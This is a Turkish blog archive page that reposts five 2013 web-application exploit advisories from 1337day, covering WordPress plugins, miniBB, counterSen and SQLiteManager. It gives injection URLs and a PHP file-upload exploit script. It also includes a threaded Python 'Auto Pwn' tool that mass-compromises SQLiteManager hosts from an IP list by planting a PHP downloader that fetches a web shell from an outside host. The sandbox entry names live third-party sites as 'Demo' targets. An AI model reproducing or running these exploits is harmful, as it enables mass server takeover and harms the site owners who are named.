Archive for 27 Ocak 2013

WordPress Dynamic Font Replacement 1.3 plugin SQL Injection Vulnerability

WordPress Dynamic Font Replacement 1.3 eklentisinde SQL Injection açığı bulundu. Açıkla MYSQL veri tabanını bağlanılarak tablo bilgileri okunabilmekte server admin ve userlerin hashları alınabilmektedir.
Açığın oluşum yeri ve açık hakkındaki exploit.

# Exploit Title: WordPress Dynamic Font Replacement 1.3 plugin SQL Injection Vulnerability 
# Date: 2013-01-27
# Author: bd0rk
#Software Link: http://downloads.wordpress.org/plugin/dynamic-font-replacement-4wp.zip
# Version: 1.3 EN
# Category:: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Windows and Ubuntu-Linux
 
----------------------------------------------------------------------------
 
Vulnerable code infile /admin/listings.php
 
SQL Injection Parameter: 'id'
 
[+]spl0iT: http://[target]/wp-content/plugins/dynamic-font-replacement-4wp/admin/listings.php?id=[SQLInjection-Code]
 
----------------------------------------------------------------------------
 
Greetings from cold Germany, bd0rk.
 
==> REST IN PEACE AARON SWARTZ <==
 
# 14670541C658329E   1337day.com [2013-01-27]   E83548C9685E497D #

miniBB 3.x Addon preview Remote File Include Vulnerability

miniBB 3.x Addon preview Remote File Include (RFI) açığı bulunmuş olup, scriptte meydadana gelen açıkla servere uzaktan bağlanabilmekte, server üzerinden back connect yapılabilmekte zararlı kodlar çalıştırılabilmektedir.

# Exploit Title: miniBB 3.x Addon preview Remote File Include Vulnerability
# Date: 2013-01-27
# Author: bd0rk
# Vendor or Software Link: http://www.minibb.com/download.php?file=minibb_plugin_preview
# Version: for miniBB 3.x
# Category:: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Ubuntu-Linux
 
------------------------------------------------------------------------
 
I found vulnerable code infile addon_preview.php line: 12
 
So an attacker can use it to compromise the system.
 
Not declared before &require parameter is: $pathToFiles
------------------------------------------------------------------------
[+]spl0iT: http://[target]/[dir]/addon_preview.php?pathToFiles=[SHELL]
------------------------------------------------------------------------
 
Greetings from cold Germany,bd0rk.
 
==> REST IN PEACE AARON SWARTZ <==
 

counterSen 1.1.0 Admin Bypass Vulnerability

counterSen 1.1.0 Admin Bypass açığı bulunmuş olup açığın oluşum yeri, Açıkla ilgili scriptin download adresi aşağıda verilmiştir.

=> counterSen 1.1.0 Admin Bypass Vulnerability
 
=> Discovered by: bd0rk
 
=> Contact: bd0rk[at]hackermail.com
 
=> Greetz: exploit-db.com, zone-h.org, Mandy, rgod, 1930
 
=> Affected Software: counterSen 1.1.0
 
=> Vendor: http://www.sensiebels.de/
 
=> DownloaD: http://www.sensiebels.de/download/download.php?id=countersen&fn=countersen&ex=zip
 
TESTED ON: Ubuntu-Linux
 
------------------------------------------------------
Exploit: http://[y0uRh0sT]/countersen/admin/index.php
------------------------------------------------------
 
 
The 24 years old, german Hacker bd0rk <---white-hat 🙂
 
SpecialComment: NO WAR AROUND THE WORLD!
 
# A1D391B6E56CDFB7   1337day.com [2013-01-27]   000D280754EED474 #

WordPress theme sandbox Arbitrary File Upload Vulnerability

WordPress theme sandbox Arbitrary eklentisinde File Upload açığı bulundu.
Açık sayesinde php Shell upload edilebilmekte servere erişim sağlanmaktadır.
wordpress upload dizinlerine php.php, php.gif, php.jpg gibi uzantıları engelleyecek .htaccess dosyası oluşturulmalıdır.
Açık hakkında açıklamalar ve açığa ait exploit.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm The Black Devils member from Inj3ct0r Team         1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: WordPress theme sandbox Arbitrary File Upload/FD Vulnerability
# Date: 21/12/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:wp-content/themes/sandbox
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
<?php
$uploadfile="cyber.php.gif";
$ch = curl_init("http://localhost/wp-content/themes/sandbox/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/wp-content/themes/sandbox/js/uploadify/cyber.php.gif
<?php
phpinfo();
?>
#------------------
Demo 
 
http://www.les-monstres.us/wp-content/themes/sandbox/header.php
http://teavalecottages.co.ke/wp-content/themes/sandbox/header.php
http://www.dealmatters.com/temp/wp-content/themes/sandbox/header.php
http://divine-worx.com/wp-content/themes/sandbox/header.php
 
http://teavalecottages.co.ke/wp-content/themes/sandbox/js/uploadify/uploadify.php
http://www.les-monstres.us/wp-content/themes/sandbox/js/uploadify/uploadify.php
http://www.infinityitpark.in/wp-content/themes/sandbox/js/uploadify/uploadify.php
 
 
 
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

SQLiteManager 1.2.4 Remote PHP Code Injection Vulnerability

SQLiteManager 1.2.4 Remote PHP Code Injection injection açığı bulunmuştur. Açık sayesinde PHP Shell upload edilebilmekte, servere full erişim hakkı elde edilebilmektedir. Açığın oluşum yeri, açık hakkındaki açıklamalar, ve exploit şu şeklilde;

Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
 
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
from time import sleep
from threading import Thread, activeCount
from socket import setdefaulttimeout
 
def strip_tags(value):
#Strip tags with RegEx
return re.sub('<[^>]*?>', '', value)
 
def writeLog(log, msg):
log.write(msg + '\r\n')
log.flush()
print msg
 
def getTextFile(txt):
return txt.read().replace('\r', '').split('\n')
 
def getUrl(ip):
urlOptions = ['/sqlite/','/sqlitemanager/','/']
for option in urlOptions:
url = 'http://' + ip + option
try:
htmlRes = urllib2.urlopen(url, None, 120).read()
if "SQLiteManager" in htmlRes:
return url
#Not Responding Error
except Exception:
continue
return None
 
def getDbId(url, myDbName):
#Find Components
htmlRes = urllib2.urlopen(url, None, 120).read()
if htmlRes:
#If you found it take all the rows
td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
#Make a dict of stripped columns
for element in td: 
if strip_tags(element) == myDbName:
#Return Id
return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
return None
 
def getOs(information):
information = str(information).lower()
if "win32" in information:
return "Win32"
else:
return "Linux / MacOSX"
 
def pwnIt(ip, activity, success):
writeLog(activity, 'Now: %s' % ip)
url = getUrl(ip)
if not url:
writeLog(activity, 'Error: %s sqlite not found' % ip)
return
 
myDbName  = "sqlphp"
myDbFile  = "sql.php"
shellName = "right.php"
if len(argv) == 3:
shellUrl  = argv[2]
else:
shellUrl  = "http://garr.dl.sourceforge.net/project/c37-shell/C37-1.3.php"
#Create Database
params = {'dbname'      : myDbName,
'dbVersion'   : '2',
'dbRealpath'  : None,
'dbpath'      : myDbFile,
'action'      : 'saveDb'}
res = urllib2.urlopen(url + "main.php", urlencode(params), 120)
#Get Operation System
opSystem = getOs(res.info())
#Get Database ID
dbId = getDbId(url + "left.php", myDbName)
#If Database Created
if dbId:
#Create Table + Shell Creator
params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
'INSERT INTO temptab VALUES (\'<?php $destination=fopen("%s","w");$source=fopen("%s","r");while ($a=fread($source,1024)) fwrite($destination,$a);fclose($source);fclose($destination);?>\');\n' %(shellName, shellUrl),
'sqlFile'         : None,
'action'          : 'sql',
'sqltype'         : '1'}
urllib2.urlopen(url + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
#Create Shell
urllib2.urlopen(url + myDbFile, None, 120)
#Remove Database
urllib2.urlopen(url + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
#Update Log
writeLog(success, 'Succces: %s - OS: %s' % (url + shellName, opSystem))
return
 
writeLog(activity, 'Fail: %s' % ip)
 
def main():
if len(argv) < 2:
filename = argv[0].replace('\\', '/').split('/')
filename = filename[-1]
 
print \
'SQLiteManager Auto Pwn\n' + \
'Made By TzAnAnY\n\n' + \
'Execute Example: ' + filename + ' ips.txt\n' + \
'Another Example: ' + filename + ' ips.txt FileURL\n' + \
'ips.txt -> File with ip:port(Filtered)\n' + \
'FileURL -> The Shell File URL\n' + \
'All Activity logs on Activity.log\n' + \
'All Success logs on Success.log'
exit()
 
ips = getTextFile(open(argv[1], 'r'))
success = open('Success.log', 'a+b')
activity = open('Activity.log', 'a+b')
#Set Socket Time Out
setdefaulttimeout(120)
 
for ip in ips:
Thread(target=pwnIt, args=(ip, activity, success)).start()
while activeCount() >= 10:
sleep(1)
 
if __name__ == '__main__':
main()
 
# 93238C8D66448B3F   1337day.com [2013-01-26]   1F04097D9EC01067 #